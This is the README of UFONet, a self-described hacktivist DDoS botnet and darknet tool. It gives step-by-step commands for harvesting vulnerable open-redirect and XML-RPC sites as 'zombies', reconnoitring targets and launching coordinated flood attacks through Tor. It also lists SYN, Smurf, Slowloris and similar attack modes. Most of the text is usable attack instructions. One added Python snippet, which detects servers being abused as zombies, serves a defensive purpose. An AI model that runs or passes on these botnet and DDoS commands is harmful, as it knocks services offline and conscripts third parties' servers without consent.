- ===========================================================================
- 888 888 8888888888 .d88888b. 888b 888 888
- 888 888 888 d88PY888b 8888b 888 888
- 888 888 888 888 888 88888b 888 888
- 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
- 888 888 888 888 888 888 Y88b888 d8P Y8b 888
- 888 888 888 888 888 888 Y88888 88888888 888
- Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
- 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
- ===========================================================================
- Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
- ===========================================================================
- ###############################
- # Project info
- ###############################
- - Website:
- https://ufonet.03c8.net
- - IRC:
- irc.freenode.net - #ufonet
- ###############################
- # FAQ
- ###############################
- https://ufonet.03c8.net/FAQ.html
- ###############################
- # Summary
- ###############################
- UFONet - Is a set of hacktivist tools that allow launching coordinated
- DDoS and DoS attacks and combine both in a single offensive.
- It also works as an encrypted DarkNET to publish and receive
- content by creating a global client/server network based on
- a direct-connect P2P architecture.
- ###############################
- # Installing
- ###############################
- UFONet runs on many platforms:
- You can try to automatically get all required libraries using (as root):
- python3 setup.py
- For manual installation, run:
- sudo apt-get install -y --no-install-recommends libpython3.11-dev python3-pycurl python3-geoip python3-whois python3-cryptography python3-requests libgeoip1 libgeoip-dev
- python3 -m pip install --upgrade pip --no-warn-script-location --root-user-action=ignore
- python3 -m pip install pycurl --upgrade --root-user-action=ignore
- python3 -m pip install GeoIP python-geoip pygeoip requests whois scapy pycryptodomex duckduckgo-search --ignore-installed --root-user-action=ignore
- ###############################
- # Searching for 'zombies'
- ###############################
- UFONet can dig through the results of different search engines to find possible 'Open Redirect' vulnerable sites.
- A common query string should be like this:
- 'page.php?url='
- 'check.cgi?url='
- 'checklink?uri='
- 'validator?uri='
- For example, you can begin a search with:
- ./ufonet -s 'page.php?url='
- Or providing a list of "dorks" from a file:
- ./ufonet --sd 'botnet/dorks.txt'
- By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:
- ./ufonet -s 'page.php?url=' --se 'bing'
- You can also search massively using all search engines supported:
- ./ufonet -s 'page.php?url=' --sa
- To control how many 'zombies' are received from the search engine reports, you can use:
- ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
- Or you can make the tool search for the maximum number of results automatically (this may take time!):
- ./ufonet --auto-search
- At the end of the process, you will be asked if you want to check the list retrieved to see
- if the urls are vulnerable.
- Do you want to check if the NEW possible zombies are valid? (Y/n)
- After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
- Do you want to update your army? (Y/n)
- If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
- -------------
- Examples:
- + with verbose: ./ufonet -s 'page.php?url=' -v
- + with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
- ###############################
- # Testing botnet
- ###############################
- UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
- For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
- Remember that urls of the 'zombies' should be like this:
- http://target.com/check?uri=
- After that, launch:
- ./ufonet -t 'botnet/zombies.txt'
- You can test for XML-RPC Pingback vulnerability related 'zombies', with:
- ./ufonet --test-rpc
- To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
- ./ufonet --test-all
- And to check if your 'zombies' are still online run:
- ./ufonet --test-offline
- Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
- ./ufonet --attack-me
- At the end of the process, you will be asked if you want to check the list retrieved to see
- if the urls are vulnerable.
- Do you want to check if the NEW possible zombies are valid? (Y/n)
- After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
- Do you want to update your army? (Y/n)
- If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
- -------------
- Examples:
- + with verbose: ./ufonet -t 'botnet/zombies.txt' -v
- + with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
- + with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
- + test whole botnet: ./ufonet --test-all
- + test XML-RPCs: ./ufonet --test-rpc
- + search for offlines: ./ufonet --test-offline
- + attack yourself: ./ufonet --attack-me
- ###############################
- # Inspecting a target
- ###############################
- UFONet can search for the biggest file on your target by crawling it:
- ./ufonet -i http://target.com
- You can use this before attacking to be more effective.
- ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
- -------------
- Example:
- +input:
- ./ufonet -i http://target.com
- +output:
- [...]
- +Image found: images/wizard.jpg
- (Size: 63798 Bytes)
- ------------
- +Style (.css) found: fonts.css
- (Size: 20448 Bytes)
- ------------
- +Webpage (.php) found: contact.php
- (Size: 2483 Bytes)
- ------------
- +Webpage (.php) found: about.php
- (Size: 1945 Bytes)
- ------------
- +Webpage (.php) found: license.php
- (Size: 1996 Bytes)
- ------------
- ================================================================================
- =Biggest File: http://target.com/images/wizard.jpg
- ================================================================================
- -------------
- ###############################
- # Abducting a target
- ###############################
- UFONet can provide you some interesting information about your target:
- ./ufonet -x http://target.com
- -------------
- Example:
- +input:
- ./ufonet -x https://yahoo.com
- +output:
- [...]
- -Target URL: https://yahoo.com
- -IP : 206.190.39.42
- -IPv6 : OFF
- -Port : 443
- -Domain: yahoo.com
- -Bytes in : 550.09 KB
- -Load time: 9.10 seconds
- -Banner: ATS
- -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
- http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
- -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
- -Reports:
- + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
- + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
-
- [...]
- ---------
- [Info] Abduction finished... ;-)
- -------------
- ###############################
- # Attacking a target
- ###############################
- UFONet can attack your target in many different ways.
- For example, enter a target to attack with a number of rounds:
- ./ufonet -a http://target.com -r 10
- In this example UFONet will attack the target 10 times for each 'zombie'. That means that
- if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
- If you don't specify a number of rounds, it will apply only 1 by default.
- Additionally, you can choose a place to recharge on target's site. For example, a large image,
- a big size file or a flash movie. In some scenarios where targets don't use cache systems
- this will make the attack more effective.
- ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
- -------------
- Examples:
- + with verbose: ./ufonet -a http://target.com -r 10 -v
- + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
- + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
- + with threads: ./ufonet -a http://target.com -r 10 --threads 500
- ###############################
- # Special attacks
- ###############################
- UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
- You can use UFONet to stress database on target by requesting random valid strings as search queries:
- ./ufonet -a http://target.com --db "search.php?q="
- Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
- processing required by target.
- You can test your list of 'XML-RPCs zombies' launching:
- ./ufonet --test-rpc
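For site operators who want to know whether their own server is being used as one of the 'zombies' described above, the following added example (not part of UFONet or its README) scans access-log lines for `url=`/`uri=` parameters that point at external hosts and for repeated POSTs to `xmlrpc.php`. The combined log format, the sample lines, the hostnames and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

REDIRECT_PARAMS = {"url", "uri"}  # parameter names from the query strings on this page
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def external_host(value, own_hosts):
    """Return the host of an absolute http(s) URL unless it is one of ours."""
    if value.startswith("//"):            # scheme-relative URL
        value = "http:" + value
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None                       # relative path: stays on this site
    host = parts.hostname.lower()
    return None if host in own_hosts else host

def scan(lines, own_hosts, pingback_threshold=3):
    reflected = Counter()  # external host -> requests bounced through this site
    xmlrpc = Counter()     # client IP -> POSTs to xmlrpc.php
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        req = urlsplit(m["target"])
        # parse_qsl percent-decodes, so encoded targets are caught as well
        for name, value in parse_qsl(req.query, keep_blank_values=True):
            if name.lower() in REDIRECT_PARAMS:
                host = external_host(value, own_hosts)
                if host:
                    reflected[host] += 1
        if m["method"] == "POST" and req.path.lower().endswith("/xmlrpc.php"):
            xmlrpc[m["ip"]] += 1
    noisy = {ip: n for ip, n in xmlrpc.items() if n >= pingback_threshold}
    return reflected, noisy

TS = "[01/Jan/2024:10:00:00 +0000]"  # constructed sample data below
SAMPLE = [
    f'198.51.100.7 - - {TS} "GET /check?uri=http://victim.example/images/big.jpg HTTP/1.1" 200 512',
    f'198.51.100.7 - - {TS} "GET /check?uri=http%3A%2F%2Fvictim.example%2Fbig.jpg HTTP/1.1" 200 512',
    f'203.0.113.9 - - {TS} "GET /page.php?url=/local/help.html HTTP/1.1" 200 900',
    f'203.0.113.9 - - {TS} "GET /page.php?url=https://www.mysite.example/about HTTP/1.1" 302 0',
    f'192.0.2.44 - - {TS} "POST /xmlrpc.php HTTP/1.1" 200 370',
] + [f'198.51.100.7 - - {TS} "POST /xmlrpc.php HTTP/1.1" 200 370'] * 3

if __name__ == "__main__":
    print(scan(SAMPLE, own_hosts={"www.mysite.example"}))
```

Endpoints that show up in `reflected` are candidates for an allow-list of redirect destinations; clients in `noisy` are candidates for rate limiting or for disabling pingbacks altogether.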
- ###############################
- # Extra attacks
- ###############################
- - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
- - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
- - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
- - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
- - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
- - SPRAY: https://en.wikipedia.org/wiki/DRDOS
- - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
- - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
- - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
- - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
- - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
- - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
- - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
- - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
- - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
- - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
- - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
- All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.
- ###############################
- # Updating
- ###############################
- UFONet has implemented an option to update the tool to the latest stable version.
- This feature can be used only if you have cloned it from a git repository.
- To check your version you should launch:
- ./ufonet --update
- This will update the tool automatically removing all files from old package.
- ###############################
- # Generating a 'Blackhole'
- ###############################
- UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
-
- * Setup web server with a folder "ufonet", this folder should be:
- - located in /var/www/ufonet (default debian/ubuntu install)
- - owned by the user running the blackhole
- - accessible with http://your-ip/ufonet/
- * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
- * Anyone wanting to connect to your server needs to set the --up-to/--down-from
- to the ip address of your webserver...
- [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
- To start a new 'blackhole' launch:
- ./ufonet --blackhole
- ###############################
- # GUI/Web Interface
- ###############################
- You can manage UFONet using a Web Interface. The tool has implemented a python web server
- connected to the core providing you a more user friendly experience.
- To launch it use:
- ./ufonet --gui
- This will open a tab on your default browser with all features of the tool and some 'extra' options:
- - SHIP.NEWS: Allows to read last "news" published by a "mothership"
- - SHIP.MISSIONS: Allows to read last "missions" published by a "mothership"
- - SHIP.STATS: Allows to review statistics from your "spaceship"
- - SHIP.RANKING: Allows to check your "ranking" position
- - SHIP.LINKS: Allows to review links published by a "mothership"
- - SHIP.STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
- - SHIP.TV: Allows to play videos published by a "mothership"
- - SHIP.GAMES: Allows to review games from your "spaceship"
- - SHIP.BROWSER: Allows to navigate/surf the Internet from a sandbox
- - SHIP.WARPS: Allows to interact with a "mothership" to download/upload "zombies"
- - GLOBAL.BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
- - GLOBAL.GRID: Allows to review statistics from other "spaceships"
- - GLOBAL.WARGAMES: Allows to propose and join some real "wargames"
- - GLOBAL.RADAR: Allows to review locations published by other "motherships"
- - GLOBAL.NEWS: Allows to read news related to UFONet
- - [...]
- ###############################
- # Timelog
- ###############################
- --------------------------
- 25.08.2024 : v.1.9
- --------------------------
- --------------------------
- 02.03.2022 : v.1.8
- --------------------------
- --------------------------
- 14.07.2021 : v.1.7
- --------------------------
- --------------------------
- 17.08.2020 : v.1.6
- --------------------------
- --------------------------
- 08.06.2020 : v.1.5
- --------------------------
- --------------------------
- 01.02.2020 : v.1.4
- --------------------------
- --------------------------
- 10.03.2019 : v.1.3
- --------------------------
- --------------------------
- 03.02.2019 : v.1.2.1
- --------------------------
- --------------------------
- 31.12.2018 : v.1.2
- --------------------------
- --------------------------
- 26.09.2018 : v.1.1
- --------------------------
- --------------------------
- 08.03.2018 : v.1.0
- --------------------------
- --------------------------
- 14.07.2017 : v.0.9
- --------------------------
- --------------------------
- 21.10.2016 : v.0.8
- --------------------------
- --------------------------
- 17.08.2016 : v.0.7
- --------------------------
- --------------------------
- 05.11.2015 : v.0.6
- --------------------------
- --------------------------
- 24.05.2015 : v.0.5b
- --------------------------
- --------------------------
- 15.12.2014 : v.0.4b
- --------------------------
- --------------------------
- 27.09.2014 : v.0.3.1b
- --------------------------
- --------------------------
- 20.09.2014 : v.0.3b
- --------------------------
- --------------------------
- 22.06.2013 : v.0.2b
- --------------------------
- --------------------------
- 18.06.2013 : v.0.1b
- --------------------------
- ###############################
- # Thanks to
- ###############################
- - BP<3
- - UFo & Mandingo & Ikujam
- - Phineas Fisher ;-)
- - The Shadow Brokers (TSB) ;_)
- - World Wide Antifas >-)
- -------------------------
- ############